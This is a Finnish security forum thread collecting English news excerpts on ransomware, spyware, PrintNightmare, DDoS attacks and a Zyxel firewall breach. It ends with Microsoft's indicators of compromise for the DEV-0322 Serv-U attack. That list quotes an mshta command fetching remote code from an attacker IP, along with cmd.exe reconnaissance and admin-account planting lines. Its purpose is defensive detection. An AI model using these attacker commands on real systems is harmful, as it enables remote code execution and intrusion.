Cyber-ketju: verkkovakoilu,kännyköiden ja wlanien seuranta, hakkerointi, virukset, DoS etc

Sol Oriens, a subcontractor for the U.S. Department of Energy (DOE) that works on nuclear weapons with the National Nuclear Security Administration (NNSA), last month was hit by a cyberattack that experts say came from the relentless REvil ransomware-as-a-service (RaaS) gang.

The Albuquerque, N.M. company’s website has been unreachable since at least June 3, but Sol Oriens officials confirmed to Fox News and to CNBC that the firm became aware of the breach sometime last month.

The company’s statement, captured in a Tweet stream posted by CNBC’s Eamon Javers on Thursday:

“In May 2021, Sol Oriens became aware of a cybersecurity incident that impacted our network environment. The investigation is ongoing, but we recently determined that an unauthorized individual acquired certain documents from our systems. Those documents are currently under review, and we are working with a third-party technological forensic firm to determine the scope of potential data that may have been involved. We have no current indication that this incident involves client classified or critical security-related information. Once the investigation concludes, we are committed to notifying individuals and entities whose information is involved …”

As Javers noted, “we don’t know everything this small company does,” but he posted a sample job posting that indicates that it handles nuclear weapons issues: “Senior Nuclear Weapon System Subject Matter. Expert with more than 20 years of experience with nuclear weapons like the W80-4.” The W80 is a type of nuclear warhead carried on air-launched cruise missiles.

According to an archived version and its LinkedIn profile, Sol Oriens is a “small, veteran-owned consulting firm focused on managing advanced technologies and concepts with strong potential for military and space applications” that works with the “Department of Defense and Department of Energy Organizations, Aerospace Contractors, and Technology Firms (sic) carry out complex programs. … We focus on ensuring that there are well-developed technologies available to maintain a strong National Defense.”
 
A secretive cyberintelligence firm claims to have created powerful hacking tools that can remotely monitor and take control of Android, MacOS and Windows devices. Designed for those looking to “investigate targets in tactical operations,” Mollitiam Industries is promoting tools that are capable of the “anonymous interception, and the remote and invisible control of targets connected to the internet,” according to documents seen by WIRED.

Marketing materials left exposed online by a third-party claim Mollitiam’s interception products, dubbed ‘Invisible Man’ and ‘Night Crawler,’ are capable of remotely accessing a target’s files, location, and covertly turning on a device’s camera and microphone. Its spyware is also said to be equipped with a keylogger, which means every keystroke made on an infected device – including passwords, search queries and messages sent via encrypted messaging apps – can be tracked and monitored.

To evade detection, the malware makes use of the company’s so-called “invisible low stealth technology” and its Android product is advertised as having “low data and battery consumption” to prevent people from suspecting their phone or tablet has been infected. Mollitiam is also currently marketing a tool that it claims enables “mass surveillance of digital profiles and identities” across social media and the dark web.
 
If remote attackers can run commands and automations in the War Room, they can potentially subvert ongoing security investigations, steal information about a victim’s cyber-defense action plans and more. According to Palo Alto’s online documentation, real-time investigations are facilitated through the War Room, which allows analysts (and on vulnerable systems, remote attackers) to do the following:
  • Run real-time security actions through the command-line interface, without switching consoles.
  • Run security playbooks, scripts and commands.
  • Collaborate and execute remote actions across integrated products.
  • Capture incident context from different sources.
  • Document all actions in one source.
  • Converse with others for joint investigations.

“When you open the War Room, you can see a number of entries such as commands, notes, evidence, tasks, etc.,” the documentation reads.

A mitigating factor however is the fact that an adversary, as mentioned, would need to have access to the same network that the Cortex XSOAR is attached to, requiring an earlier compromise or exploit.
 
A proof-of-concept for a critical Windows security vulnerability that allows remote code execution (RCE) was dropped on GitHub on Tuesday – and while it was taken back down within a few hours, the code was copied and is still out there circulating on the platform.

The bug (CVE-2021-1675) exists in the Windows Print Spooler and has been dubbed “PrintNightmare” by researchers. It was originally addressed in June’s Patch Tuesday updates from Microsoft as a minor elevation-of-privilege vulnerability, but the listing was updated last week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.

“There are 40 entries in Microsoft’s list of affected products, from Windows 7 to Windows 10 and from Server 2008 to Server 2019,” Dirk Schrader, global vice president of security research at New Net Technologies (NNT), now part of Netwrix, told Threatpost. “Given this broad surface, it is likely that this vulnerability will become an element in the tool chain of current malware families.”

On Sunday, the QiAnXin security team tweeted a video showing successful RCE – but it held back any technical or PoC details. Two days later, though, a full-blown PoC with a complete technical analysis appeared on GitHub, authored by another security firm, Sangfor.
 
Qurium Media Foundation has reported a campaign of DDoS attacks on Filipino media outlets and human rights organisations that appear to be coming from the country's Department of Science and Technology (DOST) and Army.

"During the past month, Qurium has received brief but frequent denial attacks against the Philippine alternative media outlets Bulatlat and AlterMidya, as well as the human rights group Karapatan," said the Swedish digital rights, data protection, and internet security NGO in its online report.

The flooding of the websites with superfluous requests to overload them and render them inaccessible occurred 17, 18 and 20 May, 6 June, and again during the late night and early morning of 22–23 June.

On 18 May, a DOST machine ran a vulnerability scan on Bulatlat with what Qurium said resembled Xerosecurity's "Sn1per" tool. These types of network attack surface and risk assessments are rarely done without permission from a system owner, and are believed to be the perpetrators checking on the status of the cyberattacks.

A closer look by Qurium into the DOST machine's network revealed an identical firewall configuration, suggesting action from another machine from within the organisation. Its digital certificate was linked to an email address issued by the Office of the Assistant Chief of Staff for Intelligence (OG2-PAS) of the Philippine Army.

The attacks come at a time when the three targets reported about potential investigations into crimes against humanity for drug war killings, as well as low mass testing for COVID-19, and other items critical of Philippines President Rodrigo Duterte.

DOST originally denied involvement but said that the organisation assists "other government agencies by allowing the use of some of its IP addresses in the local networks of other government agencies."
 
The computer code behind the massive ransomware attack by the Russian-speaking hacking ring REvil was written so that the malware avoids systems that primarily use Russian or related languages, according to a new report by a cybersecurity firm. NBC News reports: It's long been known that some malicious software includes this feature, but the report by Trustwave SpiderLabs, obtained exclusively by NBC News, appears to be the first to publicly identify it as an element of the latest attack, which is believed to be the largest ransomware campaign ever. "They don't want to annoy the local authorities, and they know they will be able to run their business much longer if they do it this way," said Ziv Mador, Trustwave SpiderLabs' vice president of security research.

Trustwave said the ransomware "avoids systems that have default languages from what was the USSR region. This includes Russian, Ukrainian, Belarusian, Tajik, Armenian, Azerbaijani, Georgian, Kazakh, Kyrgyz, Turkmen, Uzbek, Tatar, Romanian, Russian Moldova, Syriac, and Syriac Arabic." In May, cybersecurity expert Brian Krebs noted that ransomware by DarkSide, the Russia-based group that attacked Colonial Pipeline in May, "has a hard-coded do-not-install list of countries," including Russia and former Soviet satellites that mostly have favorable relations with the Kremlin. In general, criminal ransomware groups are allowed to operate with impunity inside Russia and other former Soviet states as long as they focus their attacks on the United States and the West, experts say. Krebs noted that in some cases, the mere installation of a Russian language virtual keyboard on a computer running Microsoft Windows will cause malware to bypass that machine.
 
Venäjän propagandaketjua lukiessani pomppasi esille ihan kummalista skriptii. Mitä paskaa? Kalastellaanko mainosten kautta jotain, mikä taho? :D :D :D
 
Ei, mutta just tälläistä oli ja miksi juuri Venäjäketjussa - ei muualla


Describing the dangers posed by cross-site scripting (XSS), CWE wrote: "The attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site.
Rämppäsin propagandaylilyöntiketjua eestaas, ei tullu samaa nyt.
 
Tuleeko teille paljon venäjänkielisiä mainoksia? Kohdentaako jotkut näitä, hyvät kaverit vai pahat toverit? Kirjutan liika väärä vai kiinnustava aihe? Hoono soomi?

Läppärissä väärät kieli asetukset vai mikä tään aiheuttaa.
Da da, täytyy tyhjentää läppäri
 
Viimeksi muokattu:
Horoshoo!! Missä skriptit on nyt? Vai onks hyvää iltaa hybridikeskus? :D

Tarjoaisin kahvit tai kaljat jos joku kertoisi mitä tää oli
 
Niin,

Kaikki, joilla on kotonaan tai yrityksessään Zyxelin palomuuri / VPN GW lienevät jo saaneet emailin Zyxeliltä, että palomuurit on häkätty jo kuukausia sitten. Ulkoa on päässyt tekemään palomuuriin SSL yhteyden ja sitä kautta sisäverkon liikenteeseen on päästy käsiksi.

Korjaavana reaktiona Zyxel antaa geoblokkerin ilmaiseksi asiakkailleen. Itselläni on tuo ollut aktivoituna jo vuosia. Omasta statistiikastani voin kertoa, että maat, joista SSL yhteyttä on palomuuriini yritetty kymmeniä kertoja päivässä, ovat järjestyksessä Venäjä, Kiina, Ukraina ja UAE. Ei liene sen takia, että minä olen erityisen kiinnostuksen kohteena, vaan jostain häkkeri on saanut tiedon, missä IP osoitteissa noita palomuureja on.

Koskee Zyxelin USG ja ZyWall tuotteita.

Että semmoista.

Simpauttaja
 
Viimeksi muokattu:
Onneksi en ole ostanut zyx-hellin tuotteita enää vuosiin koska ne ovat olleet paskaa.
Ihanaa, että olet tämän tiennyt. Olen niin aidosti huojentunut, että et ole uponnut syvään päätyyn, vaan voit olla aidosti itse läsnä tässä hetkessä. Rakkaudesta meitä muita kohtaan, avaatko patoa sen verran, että mikä palomuuri ei ole todennetusti paskaa?

Simpauttaja
 
Viimeksi muokattu:
On Tuesday, Microsoft said it was designating the hacking group for now as “DEV-0322.” “DEV” refers to a “development group” under study prior to when Microsoft researchers have a high confidence about the origin or identity of the actor behind an operation. The company said that the attackers are physically located in China and often rely on botnets made up of routers or other types of IoT devices.

“MSTIC has observed DEV-0322 targeting entities in the US Defense Industrial Base Sector and software companies,” researchers with the Microsoft Threat Intelligence Center wrote in a post. “This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure.”

Beyond the three attacker-affiliated servers already disclosed by SolarWinds, Microsoft provided three additional indicators that people can use to determine if they were hacked. The indicators of compromise are:
  • 98[.]176[.]196[.]89
  • 68[.]235[.]178[.]32
  • 208[.]113[.]35[.]58
  • 144[.]34[.]179[.]162
  • 97[.]77[.]97[.]58
  • hxxp://144[.]34[.]179[.]162/a
  • C:\Windows\Temp\Serv-U.bat
  • C:\Windows\Temp\test\current.dmp
  • The presence of suspicious exception errors, particularly in the DebugSocketlog.txt log file
  • C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
  • cmd.exe /c whoami > “./Client/Common/redacted.txt”
  • cmd.exe /c dir > “.\Client\Common\redacted.txt”
  • cmd.exe /c “C:\Windows\Temp\Serv-U.bat”
  • powershell.exe C:\Windows\Temp\Serv-U.bat
  • cmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”
Tuesday’s post also provided new technical details about the attack. Specifically:

We observed DEV-0322 piping the output of their cmd.exe commands to files in the Serv-U \Client\Common\ folder, which is accessible from the internet by default, so that the attackers could retrieve the results of the commands. The actor was also found adding a new global user to Serv-U, effectively adding themselves as a Serv-U administrator, by manually creating a crafted .Archive file in the Global Users directory. Serv-U user information is stored in these .Archive files.
Due to the way DEV-0322 had written their code, when the exploit successfully compromises the Serv-U process, an exception is generated and logged to a Serv-U log file, DebugSocketLog.txt. The process could also crash after a malicious command was run.
By reviewing telemetry, we identified features of the exploit, but not a root-cause vulnerability. MSTIC worked with the Microsoft Offensive Security Research team, who performed vulnerability research on the Serv-U binary and identified the vulnerability through black box analysis. Once a root cause was found, we reported the vulnerability to SolarWinds, who responded quickly to understand the issue and build a patch.
 
Back
Top